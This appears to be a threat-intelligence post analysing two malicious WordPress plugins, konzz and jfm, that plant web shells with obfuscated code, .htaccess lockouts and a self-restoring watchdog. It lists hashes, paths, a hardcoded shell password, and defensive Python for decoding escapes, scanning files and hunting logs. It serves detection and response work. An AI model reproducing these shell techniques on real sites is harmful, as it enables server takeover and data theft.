New Janus Shell Variations: konzz & jfm
In the ever-evolving landscape of WordPress threats, we’ve recently observed a campaign deploying twin malicious plugins: konzz and jfm. These aren't your typical "bloatware" plugins; they are likely part of a "Web Shell" or a backdoor toolkit often associated with the "Janus" or "IndoXploit" families.
The Anatomy of the "Twin" Threat
The code of both plugins, konzz and jfm, uses hexadecimal and octal escape strings (e.g., \144\151\163\160\154\141\x79, which decodes to display) to hide common PHP function names from security scanners that look for keywords like eval or system.
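The following is an added example, not code from the post or from the malware: it resolves the PHP octal/hex escapes described above and flags string literals that decode to a sensitive function or setting name. The SUSPICIOUS list and the SAMPLE_PHP snippet are constructed for illustration.

```python
import re

# Function/setting names worth flagging once escapes are decoded (assumed list).
SUSPICIOUS = ("eval", "system", "exec", "shell_exec", "passthru", "assert",
              "base64_decode", "ini_set", "display_errors")

_HEX = re.compile(r"\\x([0-9A-Fa-f]{1,2})")
_OCTAL = re.compile(r"\\([0-7]{1,3})")
_DQ_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')


def decode_php_escapes(s):
    """Resolve PHP double-quoted-string hex (\\x79) and octal (\\144) escapes."""
    s = _HEX.sub(lambda m: chr(int(m.group(1), 16)), s)
    # PHP silently wraps octal values above 255, hence the mask
    s = _OCTAL.sub(lambda m: chr(int(m.group(1), 8) & 0xFF), s)
    return s


def find_hidden_names(php_source):
    """Return (raw_literal, decoded) for escaped literals that spell a suspicious name."""
    hits = []
    for lit in _DQ_LITERAL.findall(php_source):
        if "\\" not in lit:  # plain literal, nothing hidden
            continue
        decoded = decode_php_escapes(lit)
        if any(name in decoded for name in SUSPICIOUS):
            hits.append((lit, decoded))
    return hits


# Constructed sample in the style the post describes (not the real malware).
SAMPLE_PHP = r'''<?php
@ini_set("\144\151\163\160\154\141\x79_errors", 0);
$f = "\163\171\163\164\145\155";
$f($_POST["c"]);
'''
```

Running find_hidden_names over a plugin directory is a cheap triage step; it does not replace a full static scan, since the same names can also be assembled with string concatenation or base64.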
These are the files from the twins:
- konzz
  /wp-content/plugins/konzz/konzz.php
  /wp-content/plugins/konzz/setan.php
  /wp-content/plugins/konzz/janus.php
- jfm
  /wp-content/plugins/jfm/jfm.php
  /wp-content/plugins/jfm/janus.php
  /wp-content/plugins/jfm/setan.php
  /wp-content/plugins/jfm/xxx-jpg.php
  /wp-content/plugins/jfm/cancer.php
  /wp-content/plugins/jfm/jo.php
What is the konzz plugin doing?
konzz: setan.php (the shell)
SHA256 signatures observed during this investigation:
9ee38287ae3e8e8f6b1d95779599a0366b0c130aa5a010f7b4fcf3f6fd6fd1bd
478ec2643026f4862a3f755a04d1cbbb264543e9cb1097c302d501e0af250f8c
This file provides an interactive UI for the hacker to navigate the file system. It uses eval() or system execution functions to run code. The file starts by hiding its tracks and preparing the server for heavy-duty tasks:
- It disables display_errors so that if something goes wrong, the site owner won't see any suspicious PHP warnings.
- It attempts to set the memory_limit to -1 (unlimited) and max_execution_time to 0 (no time limit). This ensures the malicious script can run large tasks (like DDoS attacks or massive file scanning) without being killed by the server.
- The script generates a unique security key (the $KbV1u variable).
- It creates a hidden file on your server whose name starts with .janus_secret_.
- This token is used as a password. Only a visitor who knows this specific token (passed via a URL parameter like ?janus_token=...) can bypass the security blocks the script is about to set up.
- The rest of the code creates a massive .htaccess file. While it claims to "protect" the site, it is actually exclusive access control for the attacker:
  - It changes the permissions (chmod 0600) of its secret files so other users on the server cannot read them.
  - It includes rules to ensure that files with extensions like .phtml, .php3, and .phar are handled in ways that allow the attacker to execute code while hiding from the site owner.
konzz: konzz.php (the manager)
SHA256 signatures observed during this investigation:
51dc705fcbaa7cfee4d8becef83366175c6536539344599987a6367a18062182
5852cfad253e86ce7a6b2e776b02d9637ed6caa8d4460a44e18f5cfa5e8458e8
70be80c4b398006b857a217b021360b9dd3e835b83d9ea68732e6511ef5e56d8
fc281377392f3827bccb60b5b18f8b24f4eb098f697cf4806ac6401e4038e9f6
196765d70f1f25a1d91f1af2fd5095768134a3a2a054ddf1620479a101a51ca5
While setan.php uses obfuscation to hide its code from static analysis (scanners that look at the file's text), it is a "passive" file that waits for instructions. konzz.php, by contrast, uses active defense: it doesn't just hide its own code; it changes the server's configuration to block security tools like nmap, sqlmap, and Acunetix. It essentially builds a "moat" around the backdoor. This moat includes a self-healing mechanism that repairs the .htaccess in case it gets modified or cleaned.
Unlike the first one, this file generates a unique cryptographic secret and tells the Apache server: "If a visitor doesn't have this specific token in the URL, pretend this file doesn't exist (403 Forbidden)."
We call this file the manager because it also sets up a "watchdog" (janus.php) to ensure that even if the connection is lost, the script finishes its work, often running as a background process or "cron-like" loop.
konzz: janus.php (the watchdog)
SHA256 signatures observed during this investigation:
e2ca0ca3dcd54868f9ad362b5beac60d7e3a19c08e7b53b0a47e07ccff2be940
This file ensures that konzz.php and setan.php are never seen by a firewall or a scanner, and that they are never deleted for long. The code uses @ignore_user_abort(true);, which means that even if you delete the file via FTP, the PHP process might still be "alive" in the server's RAM and can "ghost-write" the files back onto the disk after you think they are gone.
Now what is the jfm plugin doing? (the other bad twin)
jfm: jfm.php (the swiss-army toolkit)
SHA256 signatures observed during this investigation:
3705e80ec15c111172bbe2cf18a123857af7ea7eac24cc39348b002b99d4f73f
This plugin is very interesting: while it uses a similar obfuscation technique to konzz, the features are different. See a summary below:
- Complete File Management: It can browse directories, read, edit, rename, copy, upload, and delete files across the entire server (where permissions allow).
- Remote Command Execution: It can run system-level commands (via exec, shell_exec, etc.) and even navigate directories using a virtual terminal.
- System Enumeration: It collects detailed info about the OS, kernel, CPU, RAM, and disk usage.
- Network Attacks:
- Port Scanner: Scans other computers or internal networks for open ports.
- Wget/Download: Downloads malicious payloads directly from other servers to your site.
- Privilege Escalation Tools: It contains specific commands to find SUID/SGID files, which are often used by hackers to try and gain "Root" (total system) access.
- Persistence & Stealth:
- It manages sessions securely to ensure only the attacker can use the interface.
- It has a "Self-Destruct" feature to delete itself if the attacker thinks they are about to be caught.
- It can perform "Mass Uploads" to infect multiple directories at once.
jfm: xxx-jpg.php (a simple PHP Webshell)
SHA256 signatures observed during this investigation:
82ed71e52a5b505c310a472a27b86578f173cd7bf4c4f77593faaaa113a325a3
74a7baae08d9ef727f5501842ac5e5ba0dcae32311bd293756084c952393d041
4336ad7f0b208047092cb2cc1f4edcb581cf86ced3911b9eb5a12febf00a0fab
33962308b31f2c48e7de34b4984b0ad01e43782f9203a8583a1fa1c859af6951
2d68d322bc5523779df3541fca58416ce7b7af0c4c80e5375a7e15b17732fb4f
This file is the control panel that allows the attacker to manage your server as if they were sitting at a terminal. Below is a rundown of its features:
- The "Stealth" Session Setup. At the very top, it configures PHP session cookies to be extremely secure (HttpOnly, Secure, SameSite=Strict). This isn't for your protection; it's to ensure that once the hacker logs in to this shell, their session cannot be hijacked by anyone else. It also sets an automatic timeout of 1800 seconds (30 minutes).
- Authentication & Identity. The script identifies itself internally as "1.0-Stealth". It has a hardcoded password:
Password: hackerterlarang123
The code checks if the user is "authenticated" before allowing any other commands to run. If you don't provide the password, it returns a JSON error.
- Core Capabilities (The "Command Palette"). The switch ($DK0vL) statement reveals exactly what the attacker can do through this file. They send a JSON payload via a POST request, and this script executes it. Below is a list of the commands:
  - browse: Acts as a file explorer. It lists every file and folder, their sizes, owners, and permissions (777, 644, etc.).
  - get_file_content: Allows them to read any file on your server (including wp-config.php or other database credential files).
  - save_file: A powerful file editor/uploader. They can overwrite your existing code or upload new malware. It even includes "chunking" logic to bypass server upload limits.
  - exec: This is the most dangerous. It allows them to run system commands directly on your server (like ls, whoami, or wget to download more malware).
  - delete: Allows them to wipe files or entire directories.
  - zip: Can compress your entire website into a single .zip file for the attacker to download (stealing your entire database and source code).
  - chmod: Can change file permissions to make files writable or executable.
Indicators of Compromise (IOCs)
If you suspect your site is infected, look for the following signatures:
File System Markers
- /wp-content/plugins/konzz/konzz.php
- /wp-content/plugins/konzz/setan.php
- /wp-content/plugins/konzz/janus.php
- /wp-content/plugins/jfm/jfm.php
- /wp-content/plugins/jfm/setan.php
- /wp-content/plugins/jfm/janus.php
- /wp-content/plugins/jfm/xxx-jpg.php
- /wp-content/plugins/jfm/cancer.php
- /wp-content/plugins/jfm/jo.php
- Dot files starting with the following patterns: .janus_secret, .backup_, .secret
- .htaccess files containing RewriteCond %{QUERY_STRING} !janus_token=
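As an added example (not code from the post), here is a small hunt script that walks a WordPress docroot for the file-system markers above, which are the same artifacts setan.php plants: the known plugin paths, the dot-file prefixes, and an .htaccess carrying the janus_token RewriteCond. The build_sample_docroot helper creates a constructed throwaway tree with placeholder contents so the scan can be run offline.

```python
import os
import tempfile

# File-system markers from this post: plugin paths, dot-file prefixes, .htaccess rule.
PLUGIN_FILES = {
    "wp-content/plugins/konzz/konzz.php", "wp-content/plugins/konzz/setan.php",
    "wp-content/plugins/konzz/janus.php", "wp-content/plugins/jfm/jfm.php",
    "wp-content/plugins/jfm/setan.php", "wp-content/plugins/jfm/janus.php",
    "wp-content/plugins/jfm/xxx-jpg.php", "wp-content/plugins/jfm/cancer.php",
    "wp-content/plugins/jfm/jo.php",
}
DOTFILE_PREFIXES = (".janus_secret", ".backup_", ".secret")
HTACCESS_RULE = "RewriteCond %{QUERY_STRING} !janus_token="


def scan_tree(root):
    """Walk a WordPress docroot; return sorted (reason, relative_path) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel in PLUGIN_FILES:
                findings.append(("known plugin file", rel))
            if name.startswith(DOTFILE_PREFIXES):
                findings.append(("suspicious dot file", rel))
            if name == ".htaccess":
                with open(full, encoding="utf-8", errors="replace") as fh:
                    if HTACCESS_RULE in fh.read():
                        findings.append(("janus_token rewrite rule", rel))
    return sorted(findings)


def build_sample_docroot():
    """Constructed throwaway tree with planted markers (placeholder contents, no malware)."""
    root = tempfile.mkdtemp()

    def put(rel, body):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)

    put("wp-content/plugins/konzz/setan.php", "<?php // constructed placeholder\n")
    put("wp-content/plugins/hello/hello.php", "<?php // benign plugin, should not match\n")
    put(".janus_secret_abc123", "constructed token\n")
    put(".htaccess", "RewriteEngine On\n" + HTACCESS_RULE + "\n")  # rest of rule set omitted
    return root
```

Point scan_tree at a real docroot to use it; on a live site, check .htaccess files in every directory, since the post notes the manager rewrites them and will restore a cleaned copy.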
Network Markers
- HTTP POST Requests towards any of the files listed earlier.
- HTTP Requests (GET & POST) with the query string
?janus_token=
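The network markers above can be hunted in Apache access logs; the following is an added example (not from the post) that parses Combined Log Format lines and flags POSTs to the listed shell files and any request carrying janus_token in its query string. The log format regex is an assumption about a standard Apache layout, and SAMPLE_LOG is constructed traffic using documentation IP ranges.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache Combined/Common Log Format (assumed); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Network markers from this post: POST to any shell file, or janus_token= in any query string.
SHELL_PATHS = {
    "/wp-content/plugins/konzz/konzz.php", "/wp-content/plugins/konzz/setan.php",
    "/wp-content/plugins/konzz/janus.php", "/wp-content/plugins/jfm/jfm.php",
    "/wp-content/plugins/jfm/setan.php", "/wp-content/plugins/jfm/janus.php",
    "/wp-content/plugins/jfm/xxx-jpg.php", "/wp-content/plugins/jfm/cancer.php",
    "/wp-content/plugins/jfm/jo.php",
}


def classify(line):
    """Return the list of markers a single access-log line matches (empty if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    reasons = []
    if m.group("method") == "POST" and parts.path in SHELL_PATHS:
        reasons.append("POST to known shell path")
    # keep_blank_values so a bare '?janus_token=' still counts
    if "janus_token" in parse_qs(parts.query, keep_blank_values=True):
        reasons.append("janus_token in query string")
    return reasons


def hunt(log_text):
    """Scan a whole log; return (ip, target, reasons) for the lines that match."""
    hits = []
    for line in log_text.splitlines():
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits


# Constructed sample lines (documentation IPs, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2025:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5123
203.0.113.7 - - [10/Jan/2025:10:00:05 +0000] "POST /wp-content/plugins/jfm/xxx-jpg.php HTTP/1.1" 200 412
203.0.113.7 - - [10/Jan/2025:10:00:09 +0000] "GET /wp-content/plugins/konzz/setan.php?janus_token=abc HTTP/1.1" 200 9001
198.51.100.4 - - [10/Jan/2025:10:00:12 +0000] "GET /wp-content/plugins/konzz/setan.php HTTP/1.1" 403 199
"""
```

The last sample line (a 403 on setan.php without the token) is not one of the post's markers, but it is exactly the behaviour the manager's .htaccess produces, so a burst of such 403s on plugin files is worth a look too.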
IPs observed accessing these fake plugins
182.3.36.10
Note: The specific IP addresses provided above are the ones observed during the investigation. Specific, actionable IPs should be validated with your threat intelligence feeds.